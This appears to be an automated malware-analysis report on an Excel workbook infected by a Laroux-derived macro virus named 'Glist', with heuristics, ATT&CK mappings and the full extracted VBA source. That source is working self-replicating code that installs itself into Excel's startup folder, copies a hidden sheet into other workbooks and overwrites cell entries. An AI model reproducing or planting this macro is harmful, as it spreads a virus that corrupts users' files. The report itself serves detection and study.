MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros identified as the Laroux macro-virus, which is known to infect Excel workbooks. The 'auto_open' subroutine sets up event handlers that trigger the 'DamnedOpen' subroutine, which attempts to copy itself to 'XLSTART.XLS' in the Excel startup path, thereby establishing persistence and spreading to other workbooks.
Heuristics 3
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUSLegacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2572 bytes |
SHA-256: d941a902224418e9be2f28ddc360d98ea8539bf78d2435f5c9f3eec19c95e4d7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Glist"
' Glist Virus Version 1.0 - quick and dirty modification of Laroux
' Copyright (c) Laroux Software
' Portions copyright (c) Lord Asd
' Not too much damage, might be much worse, am I right?
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "DamnedOpen"
Application.OnEntry = "Effect"
End Sub
Sub Effect()
Attribute Effect.VB_ProcData.VB_Invoke_Func = " \n14"
Triggered = DateSerial(Year(Now()), Month(Now()), Day(Now())) - DateSerial(1997, 12, 20)
Rem date/month/day format
If (Triggered > 10) Then
ActiveCell.Value = "In madness you dwell"
Else
If (Triggered > 0) Then
ActiveCell.Value = "Out of the shadows we'll go, there's no reason to hide anymore..."
Else
End If
End If
End Sub
Sub DamnedOpen()
Attribute DamnedOpen.VB_ProcData.VB_Invoke_Func = " \n14"
m$ = Dir(Application.StartupPath & "\" & "XLSTART.XLS")
If m$ = "XLSTART.XLS" Then Alr = 1 Else Alr = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = Alr + w * 666
Select Case whichfile
Case 666
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
Sheets("Glist").Visible = True
Sheets("Glist").Select
Sheets("Glist").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "XLSTART.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("Glist").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "XLSTART.xls!DamnedOpen"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "Glist" Then
Workbooks("XLSTART.XLS").Sheets("Glist").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("Glist").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "XLSTART.xls!DamnedOpen"
Case Else
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.